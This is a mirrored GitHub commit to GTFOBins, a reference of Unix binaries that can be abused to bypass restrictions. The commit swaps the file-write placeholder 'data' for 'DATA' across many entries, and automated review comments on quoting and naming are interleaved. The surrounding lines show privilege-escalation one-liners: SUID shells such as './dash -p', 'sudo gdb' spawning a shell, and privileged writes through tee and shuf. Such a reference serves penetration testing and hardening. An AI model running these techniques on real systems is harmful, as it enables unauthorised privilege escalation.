mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced 2024-12-25 14:30:07 +01:00
Use DATA as a placeholder for file-write operations
parent
866ca2e404
commit
d4b50275bb
@ -75,11 +75,11 @@ load-library:
|
||||
file-read:
|
||||
label: File read
|
||||
description: |
|
||||
It reads files and may be used to do privileged reads or disclose files
|
||||
outside a restricted file system.
|
||||
It reads data from files, it may be used to do privileged reads or disclose
|
||||
files outside a restricted file system.
|
||||
|
||||
file-write:
|
||||
label: File write
|
||||
description: |
|
||||
It writes files and may be used to do privileged writes or write files
|
||||
outside a restricted file system.
|
||||
It writes data to files, it may be used to do privileged writes or write
|
||||
files outside a restricted file system.
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./ash"
|
||||
sudo-enabled:
|
||||
|
@ -22,7 +22,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "data" > LFILE }'
|
||||
awk -v LFILE=$LFILE 'BEGIN { print "DATA" > LFILE }'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
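Review bot: `$LFILE` is passed unquoted in `awk -v LFILE=$LFILE ...`, so a target path containing whitespace or glob characters is split or expanded by the calling shell before awk receives it. Quoting it, `awk -v LFILE="$LFILE" 'BEGIN { print "DATA" > LFILE }'`, matches the sections in this commit that already write `"$LFILE"` (shuf, tee, xxd, rlwrap). The dd section has the same unquoted use in `dd of=$LFILE`. File names are not shown on this page, so the entry names are inferred from the commands.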
@ -39,7 +39,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
bash -c 'echo data > $LFILE'
|
||||
bash -c 'echo DATA > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines and it's not binary-safe.
|
||||
code: |
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
busybox sh -c 'echo "data" > $LFILE'
|
||||
busybox sh -c 'echo "DATA" > $LFILE'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
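Review bot: `LFILE=file_to_write` is assigned without `export`, but the next line single-quotes the command, so `$LFILE` is expanded by the `busybox sh` child process. Unless the variable was already exported, it is unset there and the redirection has no target. The ash, bash and ksh sections in this commit use `export LFILE=file_to_write` with the same single-quoted form, and this entry should match so that the documented behaviour is reproducible when it is validated. The file-read block at the end of the section is cut off, so whether it shares the problem is not visible here.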
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: "./csh -b"
|
||||
sudo-enabled:
|
||||
|
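Review bot: The file-write example runs `ash -c 'echo DATA > $LFILE'`, but the `suid-enabled` line in the same section is `./csh -b`, which suggests this entry documents csh and the ash line was copied from another entry. An entry that names the wrong binary misleads anyone deriving detection or allow-list rules from it, so the line should read `csh -c 'echo DATA > $LFILE'`. The next section, whose `suid-enabled` line is `./dash -p`, carries the same `ash -c` line and would need `dash -c`. File names are not shown on this page, so the target binaries are inferred from those lines.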
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ash -c 'echo data > $LFILE'
|
||||
ash -c 'echo DATA > $LFILE'
|
||||
suid-enabled:
|
||||
- code: ./dash -p
|
||||
sudo-enabled:
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo "data" | dd of=$LFILE
|
||||
echo "DATA" | dd of=$LFILE
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -8,7 +8,7 @@ functions:
|
||||
- code: |
|
||||
ed file_to_write
|
||||
a
|
||||
data
|
||||
DATA
|
||||
.
|
||||
w
|
||||
q
|
||||
|
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
emacs file_to_write
|
||||
data
|
||||
DATA
|
||||
C-x C-s
|
||||
file-read:
|
||||
- code: emacs file_to_read
|
||||
|
@ -11,7 +11,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
gdb -nx -ex "dump value $LFILE \"data\"" -ex quit
|
||||
gdb -nx -ex "dump value $LFILE \"DATA\"" -ex quit
|
||||
sudo-enabled:
|
||||
- code: sudo gdb -nx -ex '!sh' -ex quit
|
||||
---
|
||||
|
@ -39,7 +39,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
export LFILE=file_to_write
|
||||
ksh -c 'echo data > $LFILE'
|
||||
ksh -c 'echo DATA > $LFILE'
|
||||
file-read:
|
||||
- description: It trims trailing newlines.
|
||||
code: |
|
||||
|
@ -56,7 +56,7 @@ functions:
|
||||
f:write(d);
|
||||
io.close(f);'
|
||||
file-write:
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("data"); io.close(f);'
|
||||
- code: lua -e 'local f=io.open("file_to_write", "wb"); f:write("DATA"); io.close(f);'
|
||||
file-read:
|
||||
- code: lua -e 'local f=io.open("file_to_read", "rb"); print(f:read("*a")); io.close(f);'
|
||||
sudo-enabled:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
- description: Requires a newer GNU `make` version.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
make -s --eval="\$(file >$LFILE,data)" .
|
||||
make -s --eval="\$(file >$LFILE,DATA)" .
|
||||
suid-enabled:
|
||||
- code: |
|
||||
COMMAND='/bin/sh -p'
|
||||
|
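Review bot: The description `Requires a newer GNU make version.` gives the reader no version to check a host against. The `$(file ...)` function used in the example was introduced in GNU make 4.0, so `description: Requires GNU make 4.0 or later.` would let someone assessing a system tell whether this entry applies to the installed make at all.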
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
nano file_to_write
|
||||
data
|
||||
DATA
|
||||
^O
|
||||
file-read:
|
||||
- code: nano file_to_read
|
||||
|
@ -12,7 +12,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
pico file_to_write
|
||||
data
|
||||
DATA
|
||||
^O
|
||||
file-read:
|
||||
- code: pico file_to_read
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
- description: The file path must be absolute.
|
||||
code: |
|
||||
export LFILE="/tmp/file_to_write"
|
||||
puppet apply -e "file { '$LFILE': content => 'data' }"
|
||||
puppet apply -e "file { '$LFILE': content => 'DATA' }"
|
||||
file-read:
|
||||
- description: The read file content is corrupted by the `diff` output format. The actual `/usr/bin/diff` command is executed.
|
||||
code: |
|
||||
|
@ -25,7 +25,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
python2 -c 'import urllib as u,os.environ as e;u.urlretrieve(e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python2 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python2 -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python2 -c 'open("file_to_read").read()'
|
||||
load-library:
|
||||
|
@ -25,7 +25,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
python3 -c 'import urllib.request as u;from os import environ as e; u.urlretrieve (e["URL"], e["LFILE"])'
|
||||
file-write:
|
||||
- code: python3 -c 'open("file_to_write","w+").write("data")'
|
||||
- code: python3 -c 'open("file_to_write","w+").write("DATA")'
|
||||
file-read:
|
||||
- code: python3 -c 'open("file_to_read").read()'
|
||||
load-library:
|
||||
|
@ -6,7 +6,7 @@ functions:
|
||||
- description: This adds timestamps to the output file. This relies on the external `echo` command.
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
rlwrap -l "$LFILE" echo data
|
||||
rlwrap -l "$LFILE" echo DATA
|
||||
suid-enabled:
|
||||
- code: ./rlwrap -H /dev/null /bin/sh -p
|
||||
sudo-enabled:
|
||||
|
@ -22,7 +22,7 @@ functions:
|
||||
export LFILE=file_to_save
|
||||
ruby -e 'require "net/http"; Net::HTTP.start(ENV["RHOST"], ENV["RPORT"]) { |http| r = http.get(ENV["RFILE"]); open(ENV["LFILE"], "wb") { |file| file.write(r.body) } }'
|
||||
file-write:
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("data") }'
|
||||
- code: ruby -e 'File.open("file_to_write", "w+") { |f| f.write("DATA") }'
|
||||
file-read:
|
||||
- code: ruby -e 'puts File.read("file_to_read")'
|
||||
load-library:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sed -n "1s/.*/data/w $LFILE" /etc/hosts
|
||||
sed -n "1s/.*/DATA/w $LFILE" /etc/hosts
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -4,14 +4,14 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
shuf -e data -o "$LFILE"
|
||||
shuf -e DATA -o "$LFILE"
|
||||
suid-enabled:
|
||||
- description:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
./shuf -e data -o "$LFILE"
|
||||
./shuf -e DATA -o "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sudo shuf -e data -o "$LFILE"
|
||||
sudo shuf -e DATA -o "$LFILE"
|
||||
---
|
||||
|
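Review bot: The `suid-enabled` item opens with an empty `description:` key, which YAML loads as null rather than as an absent field. Either drop the key so the item starts with `- code: |` like the `file-write` and `sudo-enabled` items in this section, or fill in the caveat it was meant to carry. As it stands, a template that renders the description unconditionally could produce an empty paragraph for this entry.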
@ -5,7 +5,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "data";'
|
||||
sqlite3 /dev/null -cmd ".output $LFILE" 'select "DATA";'
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|
@ -10,7 +10,7 @@ functions:
|
||||
code: |
|
||||
LFILE=file_to_write
|
||||
TF=$(mktemp)
|
||||
echo data > "$TF"
|
||||
echo DATA > "$TF"
|
||||
tar c --xform "s@.*@$LFILE@" -OP "$TF" | tar x -P
|
||||
file-read:
|
||||
- description: This only works for GNU tar.
|
||||
|
@ -4,13 +4,13 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
suid-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | ./tee -a "$LFILE"
|
||||
echo DATA | ./tee -a "$LFILE"
|
||||
sudo-enabled:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | sudo tee -a "$LFILE"
|
||||
echo DATA | sudo tee -a "$LFILE"
|
||||
---
|
||||
|
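Review bot: The plain `file-write` example runs `echo DATA | ./tee -a "$LFILE"`, identical to the `suid-enabled` example below it. The `./` prefix is the convention for the local SUID copy, and the shuf section in this commit uses the bare command for the unprivileged case, so `echo DATA | tee -a "$LFILE"` would be consistent. A short `description` noting that `-a` appends to an existing file rather than replacing it would also help, since the function is labelled as a write.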
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
vi file_to_write
|
||||
idata
|
||||
iDATA
|
||||
^[
|
||||
w
|
||||
file-read:
|
||||
|
@ -9,7 +9,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
vim file_to_write
|
||||
idata
|
||||
iDATA
|
||||
^[
|
||||
w
|
||||
file-read:
|
||||
|
@ -3,7 +3,7 @@ functions:
|
||||
file-write:
|
||||
- code: |
|
||||
LFILE=file_to_write
|
||||
echo data | xxd | xxd -r - "$LFILE"
|
||||
echo DATA | xxd | xxd -r - "$LFILE"
|
||||
file-read:
|
||||
- code: |
|
||||
LFILE=file_to_read
|
||||
|